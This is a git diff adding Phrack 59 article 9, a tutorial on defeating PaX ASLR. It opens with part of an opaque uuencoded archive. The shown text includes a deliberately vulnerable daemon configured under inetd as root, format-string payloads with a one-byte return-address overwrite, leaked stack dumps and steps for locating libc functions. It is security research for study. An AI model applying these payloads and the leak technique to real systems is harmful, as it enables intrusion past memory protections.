+M-AX51;XP_,4W8/P+"?^_J[]MK=3K%,#_R_5RL12V/BF5A9R"]7IK!7,OEG,1
+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
+B[_;O]N_V[_;O]N_V[_;O]N_V[_;O7^3O_P-))_I>`)`!````
+`
+end
diff --git a/phrack59/9.txt b/phrack59/9.txt
new file mode 100644
index 0000000..e77facd
--- /dev/null
+++ b/phrack59/9.txt
@@ -0,0 +1,1132 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x09 of 0x12
+
+|=------------------=[ Bypassing PaX ASLR protection ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------=[ Tyler Durden <p59_09@author.phrack.org> ]=------------=|
+
+
+ 0. Introduction
+    a. What is PaX and what it does
+    b. Known attacks against old PaX implems
+    c. What changed since ret-into-dl-resolve()
+
+ 1. What you ever wanted to know about PaX
+    a. Paging basics
+    b. PaX foundations (PAGEEXEC feature)
+    c. Address Space Layout Randomization Layout (ASLR)
+       - Stack ASLR
+       - Libraries ASLR
+       - Executable PT_LOAD double mapping technique
+       - ET_EXEC to ET_DYN full relinking technique
+    d. Last enforcements
+
+ 2. ASLR weaknesses
+    a. EIP partial overwrite
+    b. Generating information leaks
+
+ 3. Understanding the exploitation step by step
+    a. Global flow understanding using gdb
+    b. Examining the remote stack
+    c. Verify printf relative offset using elfsh
+    d. Guess functions and parameters absolute addresses
+
+ 4. Exploitation success conditions
+    a. Looking for exploitable stack based overflows
+    b. Looking for leak functions
+    c. The frame pointer problem and workaround
+    d. Discussion about segvguard
+
+ 5. The code
+    a. Sample target
+    b. ret-into-printf info leak code
+
+ 6. Referenced papers and projects
+
+
+
+
+-------[ 0. Introduction
+
+
+ [a] PaX, stands for PageEXec, is a linux kernel patch protection against
+ buffer overflow attacks . It is younger than Openwall (PaX has been
+ available for a year and a half now) and takes profit from the
+ processor lowlevel paging mechanism in order to detect injected code
+ execution . It also make return into libc exploits very hard to
+ accomplish . This patch is very easy to use and can be downloaded
+ on [1] , so as the tiny chpax tool used to configure PaX on a per
+ file basis .
+
+ For accomplishing its task, PaX hooks two OS mechanisms :
+
+ - Refuse code execution on writable pages (PAX_PAGEEXEC option) .
+ - Randomize mmap()'ed library base address to make return into libc
+   harder .
+
+ [b] Some years ago, Nergals came with his return into plt technique
+ (ELF specific) allowing him to bypass the mmap() protection (implemented 
+ in OpenWall [2] at this time) . The technique has been very well described
+ in a recent paper [3] and wont be developped again in this article .
+
+ [c] In the last months, the PaX team released et_dyn.zip, showing us how
+ to relink executable (ET_EXEC ELF objects) into ET_DYN objects, so that
+ the main object base address would also be randomized, and Nergal's
+ return-into-plt attack blocked .
+
+ Unfortunately, most people think it is a real pain to relink all sensible
+ binaries . The PaX team decided to release a new version of the patch,
+ accomplishing the same task without needing relinking .
+
+ Since this patch represents the latest improvement concerning buffer
+ overflow protection, a new study was necessary . We will demonstrate
+ that in certain conditions, it is still possible to exploit stack based
+ buffer overflows protected by PaX with all options actived, including
+ the new ET_EXEC binary base address randomizing .
+
+ We will show that we can reduce the problem to a standard return-into-libc
+ exploitation . Heap overflows wont be developped, but it might also be
+ possible to exploit them in an ASLR environment using a derived
+ technique .
+
+
+
+-------[ 1. What you ever wanted to know about PaX
+
+
+ If you dont care about PaX itself, please pass this paragraph and go read
+ paragraph 2 now :)
+
+
+ [a] Paging basics
+
+
+ On INTEL Pentium processors, userland pages are 4Ko big . The design
+ for 32 bits linear addresses (when pagination is enabled, which is
+ mandatory if protected mode is enabled) is :
+
+
+  ---------------------------------------
+ |	     |		 |		|
+  ---------------------------------------
+
+    ^		^		^
+    |		|		|_____ Page offset (12 bits)
+    |		|
+    |		|_____ Page table entry index (10 bits)
+    |
+    |_______ Page directory entry index (10 bits)
+
+
+ If no extra options (like PSE or PAE) are actived, the processor handle a
+ 3 level paging, using 2 intermediary tables called the page directory and
+ the page table .
+
+ On Linux, segmentation protection is not used by default (segment base
+ address is 0 everywhere, and segment limit is FFFFF everywhere), it means
+ that virtual address space and linear address space are the same . For
+ extended information about the INTEL Pentium protected mode, please 
+ refers to the Documentation reference [4], paragraph 3.6.2 describes 
+ paging basics, including PDE and PTE explainations .
+
+ For instance, linear address 0804812C can be decomposed like :
+
+ 08 + two high bits in the third nibble '0' : Page directory entry index
+ two low bits in the third nibble '0' + 48  : Page table entry index
+ 12C (12 low bits)			    : Page offset
+
+
+ [b] PAGEEXEC option
+
+
+ There is a documentation on the PaX website [1] but as written on the
+ webpage, it is quite outdated . I will try (thanks to the PaX team)
+ to explain PaX mechanisms again and giving some details for our
+ purpose :
+
+ First, PaX hook your page fault handler . This is an routine executed
+ each time you have an access problem to a memory page . Linux pages are
+ all 4Ko on the platform we are interrested in . This fault can be due
+ to many reasons :
+
+ - Presence checking (not all 4Ko zone are mapped in memory at this
+ moment, some pages may be swapped for instance and we want to unswap
+ it)
+
+ - Supervisor check (the page has its supervisor bit set, only the kernel
+ can access it, normal behavior is to send SIGSEGV)
+
+ - Access mode check : try to write and not allowed, try to read and not
+ allowed, normal behaviour is send SIGSEGV .
+
+ - Other reasons described in [4] .
+
+ Since there is no dedicated bit on PDE (page directory entry) or PTE (page
+ table entry) to control page execution, the PaX code has to emulate it, 
+ in order to detect inserted shellcode execution in the flow .
+
+ Every protected pages tables entries (PTE) are set to supervisor .
+ Protected pages include everything (stack, heap, data pages) except the
+ original executable code (executable PT_LOAD program header for each
+ process object) .
+
+ Consequences are quite directs : each time we access one of these pages,
+ the page fault handler is executed because the supervisor bit has been
+ detected during the linear-to-physical address translation (so called page
+ table walk) . PaX can control access to the page in its PF handling code .
+
+ What PaX can choose to do at this time :
+
+ - If it is a read/write access, consider it as normal if original page
+ flags allows it and do not kill the task . For this to work, the PaX code
+ has to temporary fill the corresponding PTE to a user one (remember that
+ the page has been protected with the supervisor bit whereas it contains
+ userland code), then do access on the page to fill the dtlb, and set the
+ page as supervisor again . This will result in further data access to the
+ page not beeing filtered by PF since it will use the dtlb cached value and
+ not perform a page table walk again ;)
+
+ - If it is an execution access, kill the task and write the exploitation
+ attempt in the logs .
+
+
+ [c] ASLR
+
+
+  => Stack ASLR
+
+ bash$ export EGG="/bin/sh"
+ bash$ cat test.c
+
+<++> DHagainstpax/test.c !187b540a
+
+ #include <stdio.h>
+ #include <stdlib.h>
+
+ int     main(int argc, char **argv, char **envp)
+ {
+   char  *str;
+
+   str = getenv("EGG");
+   printf("str = %p (%s) , envp = %p, argv = %p, delta = %u \n",
+          str, str, envp, argv, (u_int) str - (u_int) argv);
+   return (0);
+ }
+
+<-->
+
+ bash$ ./a.out
+ str = 0xb7a2aece (/bin/sh) , envp = 0xb7a29bbc, argv = 0xb7a29bb4,
+ delta = 4890
+ bash$ ./a.out
+ str = 0xb9734ece (/bin/sh) , envp = 0xb973474c, argv = 0xb9734744,
+ delta = 1930
+ bash$ ./a.out
+ str = 0xba36cece (/bin/sh) , envp = 0xba36c73c, argv = 0xba36c734,
+ delta = 1946
+ bash$ chpax -v a.out
+ a.out: PAGE_EXEC is enabled, trampolines are not emulated, mprotect() is
+ restricted, mmap() base is randomized, ET_EXEC base is randomized
+ bash$
+
+ After investigation, it seems like the stack address is randomized on
+ the 28 low bits, but in 2 times, which explain why the EGG environment
+ variable is always on the same page offset (ECE) . First, bits 12 to 27 get
+ randomized, then environment is copied on the stack, finally the page
+ offset (bits 0 to 11) is randomized using some %esp padding . Note that
+ low 4 bits are always 0 because the kernel enforces 16 bytes 
+ alignement after the %esp pad . This is not a big vulnerability and 
+ you dont need it to manage ASLR exploitation, even if it might help 
+ in some cases . It may be corrected in the next PaX version however .
+
+
+  => Libraries ASLR
+
+
+ bash$ cat /proc/self/maps | grep libc
+ 409da000-40ae1000 r-xp 00000000 03:01 833281     /lib/libc-2.2.3.so
+ 40ae1000-40ae7000 rw-p 00106000 03:01 833281     /lib/libc-2.2.3.so
+ bash$ cat /proc/self/maps | grep libc
+ 4e742000-4e849000 r-xp 00000000 03:01 833281     /lib/libc-2.2.3.so
+ 4e849000-4e84f000 rw-p 00106000 03:01 833281     /lib/libc-2.2.3.so
+ bash$ cat /proc/self/maps | grep libc
+ 4b61b000-4b722000 r-xp 00000000 03:01 833281     /lib/libc-2.2.3.so
+ 4b722000-4b728000 rw-p 00106000 03:01 833281     /lib/libc-2.2.3.so
+ bash$
+
+ Library base addresses get randomized on 16 bits (bits 12 to 27) . Page
+ offset (low 12 bits) is not randomized, the high nibble is not randomized
+ as well (always '4' to allow big library mapping, this nibble wont change
+ unless a very big zone is mapped) . We already note that there's no NUL
+ bytes in the library addresses, the PaX team choosed to randomize address
+ on 16 bits instead .
+
+
+  => Executable PT_LOAD double mapping technique
+
+
+  In order to block classical return-into-plt exploits, we can use two
+  mechanisms . The first one consists in automatically remapping the
+  executable program header (containing the binary .plt) and set the
+  old (original) mapping as non-executable using the PAGEXEC option .
+
+  For obscure reasons linked to crt*.o PIC code, vm_areas framing the
+  remapped region have to share the same physical address than vm_areas
+  framing the original region but that's not important for the presented
+  attack .
+
+  The data PT_LOAD program header is not moved because the remapped code
+  may contains absolute references to it . This is a vulnerability because
+  it makes .got accessible in rw mode . We could for instance poison
+  the table using partial entry overwrite (overwriting only 1 or 2 bytes in
+  the entry) but this wont be discussed in the paper since this attack is
+  derived from [5] and would require similar conditions . Moreover, the
+  remapping option is time consuming and we prefer using full relinking .
+
+
+  => ET_EXEC to ET_DYN full relinking technique
+
+
+  Now it comes more tricky ;p Maybe you already noticed executable
+  libraries in your tree . These objects are ET_DYN (shared) and contains
+  a valid entry point and valid interpreter (.interp) section . libc.so is
+  very good examples :
+
+  bash$ /lib/libc.so.6
+  GNU C Library stable release version 2.2.3, by Roland McGrath et al.
+  (...)
+  Report bugs using the `glibcbug' script to <bugs@gnu.org>.
+  bash$
+
+  bash$ /usr/lib/libncurses.so
+  Segmentation fault
+  bash$
+
+  If we look closer at these libraries, we can see :
+
+  bash$ objdump -x /lib/libc.so.6 | grep INTERP
+   INTERP off    0x001065f2 vaddr 0x001065f2 paddr 0x001065f2 align 2**0
+  bash$ objdump -x /usr/lib/libncurses.so | grep INTERP
+  bash$
+
+  A sample relinking package called et_dyn.zip can be obtained on the PaX
+  website, it shows how to perform relinking for your own binaries . For
+  this, you just have to request a PT_INTERP segment to be created (not
+  the case by default except for libc) and have a valid entry point
+  function (a main function is enough) .
+
+  This relinking will result in all zone (code and data program header)
+  beeing mapped as shared libraries, with base address randomized using
+  the standard PaX mmap() mechanism . This is the protection we are going 
+  to defeat .
+
+
+ [d] Last enforcements
+
+
+  PaX also prevents from mprotect() based attacks, when mprotect is
+  used to regain execution rights on a shellcode inserted in the stack for
+  instance . It matters because in case we are able to guess the mprotect()
+  absolute address, we wont be able to abuse it .
+
+  Trampoline emulation is not explained because it doesnt matter for our
+  purpose .
+
+
+
+-------[ 2. ASLR weaknesses
+
+
+ [a] As we saw, page offset is 12 bits long . It means that a one byte
+ EIP overflow is not risky because we know that the modified return
+ address will still point in the same page, since the INTEL x86 architecture
+ is little endian . Partial overflows have not been studied much, except for
+ the alphanumeric shellcode purpose [6] and for fp overwriting [7] . Using
+ this technique we can replay or bypass part of the original code .
+
+ What is more interresting for us is replaying code, in our case, replaying
+ buffer overflows, so that we'll be able to control the process execution
+ flow and replay vulnerable code as much as needed . We start thinking
+ about some brute forcing mechanism but we want to avoid crashing the
+ program .
+
+ [b] What we have to do against PaX ASLR is retreiving information about
+ the process, more precisely about the process address space .
+
+ I'll ask you to have a look at this sample vulnerable code before saying
+ the whole technique :
+
+<++> DHagainstpax/pax_daemon.c !d75c8383
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define		NL		'\n'
+#define		CR		'\r'
+#define		OKAY_PASS	"evil"
+#define		FATAL(str)	{ perror(str); exit(-1); }
+
+int		verify(char *pass);
+int		do_auth();
+
+char		pass[48];
+int		len;
+
+
+int	main(int argc, char **argv)
+{
+  return (do_auth());
+}
+
+
+/* Non-buggy passwd based authentication */
+int		do_auth()
+{
+  printf("Password: ");
+  fflush(stdout);
+  len = read(0, pass, sizeof(pass) - 1);
+  if (len <= 0)
+    FATAL("read");
+  pass[len] = 0;
+  if (!verify(pass))
+    {
+      printf("Access granted .\n");
+      return (0);
+    }
+
+  printf("You loose !");
+  fflush(stdout);
+  return (-1);
+}
+
+
+/* Buggy password check (stack based overflow) */
+int		verify(char *pass)
+{
+  char		filtered_pass[32];
+  int		i;
+
+  bzero(filtered_pass, sizeof(filtered_pass));
+
+  /* this protocol is a pain in the ass */
+  for (i = 0; pass[i] && pass[i] != NL && pass[i] != CR; i++)
+    filtered_pass[i] = pass[i];
+
+  if (!strcmp(filtered_pass, OKAY_PASS))
+    return (0);
+
+  return (-1);
+}
+
+<-->
+
+
+ This is a tiny password based authentication daemon, running throught
+ inetd or at the command line . For inetd use, here is the line to
+ add in inetd.conf :
+
+ 666 stream tcp nowait root /usr/sbin/tcpd \
+ /home/anonymous/DHagainstpax/paxtestd
+
+ Just replace the command line with your own path for the daemon, inform
+ inetd about it, and verify that it works well :
+
+ bash$ pidof inetd
+ 99
+ bash$ kill -HUP 99
+ bash$ netstat -a -n | grep 666
+ tcp        0      0 0.0.0.0:666             0.0.0.0:*          LISTEN
+ bash$
+
+ This is a quite dumb code printing a password prompt, waiting for an
+ input, and comparing it with the valid password, filtering CR and NL
+ caracters .
+
+ bash$ ./paxtestd
+ Password: toto
+ You loose !
+ bash$ ./paxtestd
+ Password: evil
+ Access granted .
+ bash$
+
+ For bored people who think that this code cant be found in the wild,
+ I would just argue that this work is proof of concept . Exploitation
+ conditions are generalized in paragraph 4 .
+
+ We can easily idenfify a stack based buffer overflow vulnerability
+ in this daemon, since the filtered_pass[] buffer is filled with the
+ pass[] buffer, the copy beeing filtered in a 'for' loop with a missing
+ size checking condition .
+
+ [b] What can we do to exploit this vulnerability in a PaX full random
+ address space protected environment ? If we look closed, here is what
+ we can see :
+
+ (...)
+  printf("Password: ");
+  fflush(stdout);
+  len = read(0, pass, sizeof(pass) - 1);
+  if (len <= 0)
+    FATAL("read");
+  pass[len] = 0;
+  if (!verify(pass))
+    {
+ (...)
+
+ The assembler dump (slighly modified to match symbol names cause
+ objdump symbol matching sucks :) for do_auth() looks like that :
+
+ 804858c:	55                   	push   %ebp
+ 804858d:	89 e5                	mov    %esp,%ebp
+ 804858f:	83 ec 08             	sub    $0x8,%esp
+ 8048592:	83 c4 f4             	add    $0xfffffff4,%esp
+ 8048595:	68 bc 86 04 08       	push   $0x80486bc
+ 804859a:	e8 5d fe ff ff       	call   80483fc		<printf>
+ 804859f:	83 c4 f4             	add    $0xfffffff4,%esp
+ 80485a2:	ff 35 00 98 04 08    	pushl  0x8049800
+ 80485a8:	e8 1f fe ff ff       	call   80483cc		<fflush>
+ 80485ad:	83 c4 20             	add    $0x20,%esp
+ 80485b0:	83 c4 fc             	add    $0xfffffffc,%esp
+ 80485b3:	6a 2f                	push   $0x2f
+ 80485b5:	68 20 98 04 08       	push   $0x8049820
+ 80485ba:	6a 00                	push   $0x0
+ 80485bc:	e8 6b fe ff ff       	call   804842c		<read>
+ 80485c1:	89 c2                	mov    %eax,%edx
+ 80485c3:	89 15 50 98 04 08    	mov    %edx,0x8049850
+ 80485c9:	83 c4 10             	add    $0x10,%esp
+ 80485cc:	85 d2                	test   %edx,%edx
+ 80485ce:	7f 17                	jg     80485e7	    ; if (len <= 0)
+ 80485d0:	83 c4 f4             	add    $0xfffffff4,%esp
+ 80485d3:	68 c7 86 04 08       	push   $0x80486c7
+ 80485d8:	e8 df fd ff ff       	call   80483bc		<perror>
+ 80485dd:	83 c4 f4             	add    $0xfffffff4,%esp
+ 80485e0:	6a ff                	push   $0xffffffff
+ 80485e2:	e8 35 fe ff ff       	call   804841c		<exit>
+ 80485e7:	b8 20 98 04 08       	mov    $0x8049820,%eax
+ 80485ec:	c6 04 02 00          	movb   $0x0,(%edx,%eax,1)
+ 80485f0:	83 c4 f4             	add    $0xfffffff4,%esp
+ 80485f3:	50                   	push   %eax
+ 80485f4:	e8 27 ff ff ff       	call   8048520		<verify>
+ 80485f9:	83 c4 10             	add    $0x10,%esp
+
+ More precisely:
+
+ (...)
+ 8048595:	68 bc 86 04 08       	push   $0x80486bc
+ 804859a:	e8 5d fe ff ff       	call   80483fc		<printf>
+ (...)
+ 80485f4:	e8 27 ff ff ff       	call   8048520		<verify>
+ 80485f9:	83 c4 10             	add    $0x10,%esp
+
+
+ The 'call printf' and 'call verify' are cleary on the same page, we know 
+ this because the 20 high bits of their respective linear address are the
+ same . It means that we are able to return on this instruction using a 
+ one (or two) byte(s) eip overflow . If we think about the stack state, 
+ we can see that printf() will be called with parameters already present 
+ on the stack, i.e. the verify() parameters. If we control the first 
+ parameter of this function, we can supply a random format string to the 
+ printf function and generate a format bug, then call the vulnerable 
+ function again, this way we hope resuming the problem to a standard 
+ return into libc exploit, examining the remote process address space, 
+ more precisely the remote stack, in particular return addresses.
+
+ Lets prepare a 37 byte long buffer (32 bytes buffer, 4 byte frame pointer,
+ and one low EIP byte) for the password input :
+
+ "%001$08u                            \x9a"
+ "%002$08u                            \x9a"
+ "%003$08u                            \x9a"
+ "%iii$08u                            \x9a"
+
+ These format strings will display the 'i'th unsigned integer from the
+ remote stack . Using this we can retreive interresting values using
+ leak.c given at the end if this paper .
+
+ For those who are not that familiar with format bugs, this will read
+ the i'th pushed parameter on the stack (iii$) and print it as an unsigned
+ integer (%u) on eight characters (8), padding with '0' char if needed .
+ Format strings are deeply explained in the printf(3) manpage .
+
+ Note that the 37th byte \x9a is the low byte in the 'call printf' linear
+ address . Since the caller is responsible for parameters popping, they
+ are still present on the stack when the verify function returns ('ret')
+ and when the new return address is pushed by the 'call printf' so that
+ the stack pointer is well synchronized .
+
+ bash-2.05$ ./runit
+ [RECEIVED FROM SERVER] *Password: *
+ Connected! Press ^C to launch : Starting remote stack retreiving ...
+
+ Remote stack :
+ 00000000 08049820 0000002F 00000001
+ 472ED57C 4728BE10 B9BDB84C 4727464F
+ 080486B0 B9BDB8B4 472C6138 473A2A58
+ 47281A90 B9BDB868 B9BDB888 472B42EB
+ 00000001 B9BDB8B4 B9BDB8BC 0804868C
+
+ bash-2.05$
+
+ In this first example we read 80 bytes on the stack, reading 4 bytes per
+ 4 bytes, replaying 20 times the overflow and provoking 20 times a format
+ bug, each time incrementing the 'iii' counter in the format string (see
+ below) .
+
+ As soon as we know enough information to perform a return into libc as
+ described in [3], we can stop generating format bugs in loop and fully
+ erase eip (and the parameters standing after eip on the stack) and
+ perform standard return-into-libc exploitation . We can also choose
+ to exploit the program using the generated format bugs as described it
+ [8] .
+
+
+
+-------[ 3. Understanding the exploitation step by step
+
+
+
+ The goal is to guess libc addresses so that we can perform a standard
+ return into libc exploitation . For that we will use relative offsets
+ from the retaddr we can read on the stack . This paragraph has been
+ done to help you in your first ASLR exploitation .
+
+ [a] Let's understand better the execution flow using a debugger. This
+ is what we can see in the gdb debugging session for the vulnerable
+ daemon, at this moment waiting for its first input :
+
+ * WITHOUT ET_EXEC base address randomization
+
+ (gdb) bt
+ #0  0x400dff14 in __libc_read () at __libc_read:-1
+ #1  0x4012ca58 in __DTOR_END__ () from /lib/libc.so.6
+ #2  0x0804864f in main (argc=1, argv=0xbffffd54) at pax_daemon.c:26
+ #3  0x4003e2eb in __libc_start_main (main=0x8048634 <main>, argc=1,
+		ubp_av=0xbffffd54, init=0x8048374 <_init>,
+		fini=0x804868c <_fini>, rtld_fini=0x4000c130 <_dl_fini>,
+		stack_end=0xbffffd4c) at ../sysdeps/generic/libc-start.c:129
+(gdb)
+
+
+ * WITH ET_EXEC base address randomization
+
+ (gdb) bt
+ #0  0x4365ef14 in __libc_read () at __libc_read:-1
+ #1  0x436aba58 in __DTOR_END__ () from /lib/libc.so.6
+ #2  0x4357d64f in ?? ()
+ #3  0x435bd2eb in __libc_start_main (main=0x8048634 <main>, argc=1,
+	       ubp_av=0xb5c36cf4, init=0x8048374 <_init>,
+	       fini=0x804868c <_fini>, rtld_fini=0x4358b130 <_dl_fini>,
+	       stack_end=0xb5c36cec) at ../sysdeps/generic/libc-start.c:129
+(gdb)
+
+
+ As you can see, the symbol table is not synchronized anymore with the
+ memory dump so that we cant rely on the resolved names to debug . Note
+ that we will dispose of a correct symbol table in case the ET_EXEC binary
+ object has been relinked into a ET_DYN one, has explained in paragraph
+ 1, part c .
+
+
+ [b] Using the exploit, here is what we can see if we examine the stack with
+ or without the ET_EXEC rand option :
+
+ bash$ ./runit
+ [RECEIVED FROM SERVER] *Password: *
+ Connected! Press ^C to launch : Starting remote stack retreiving ...
+
+ Remote stack (with ET_EXEC rand enabled) :
+ 00000000 08049820 0000002F 00000001
+ 482D157C 4826FE10 BDDB44DC 4825864F
+ 080486B0 BDDB4544 482AA138 48386A58
+ 48265A90 BDDB44F8 BDDB4518 482982EB
+ 00000001 BDDB4544 BDDB454C 0804868C
+
+ If we disable the ET_EXEC rand option, here is what we see :
+
+ bash$ ./runit
+
+ (...)
+
+ Remote stack (with ET_EXEC rand disabled) :
+ 00000000 08049820 0000002F 00000001
+ 4007757C 40015E10 BFFFFCEC 0804864F
+ 080486B0 BFFFFD54 40050138 4012CA58
+ 4000BA90 BFFFFD08 BFFFFD28 4003E2EB
+ 00000001 BFFFFD54 BFFFFD5C 0804868C
+
+ As we want to do a return into libc, address pointing in the libc are the
+ most interresting . What we are looking for is the main() return address
+ pointing in the remapped instance of the __libc_start_main function, in
+ the .text section in the libc's address space .
+
+ Here is how to interpret the stack dump :
+
+ 00000000 (...)
+ 08049820
+ 0000002F
+ 00000001
+ 435F657C
+ 43594E10
+ B5C36C8C do_auth frame pointer
+ 4357D64F do_auth() return address
+ 080486B0 do_auth parameter ('pass' ptr)
+ B5C36CF4
+ 435CF138
+ 436ABA58
+ 4358AA90
+ B5C36CA8
+ B5C36CC8 main() frame pointer
+ 435BD2EB main() return address
+ 00000001 argc
+ B5C36CF4 argv
+ B5C36CFC envp
+ 0804868C (...)
+
+
+ [c] Now let's look at the libc binary to know the relative address for
+ functions we are interrested in . For that we'll use the regex option
+ in ELFsh [9] :
+
+ bash-2.05$ elfsh -f /lib/libc.so.6 -sym ' strcpy '\|' exit '\|' \
+ setreuid '\|' system '
+
+ [SYMBOL TABLE]
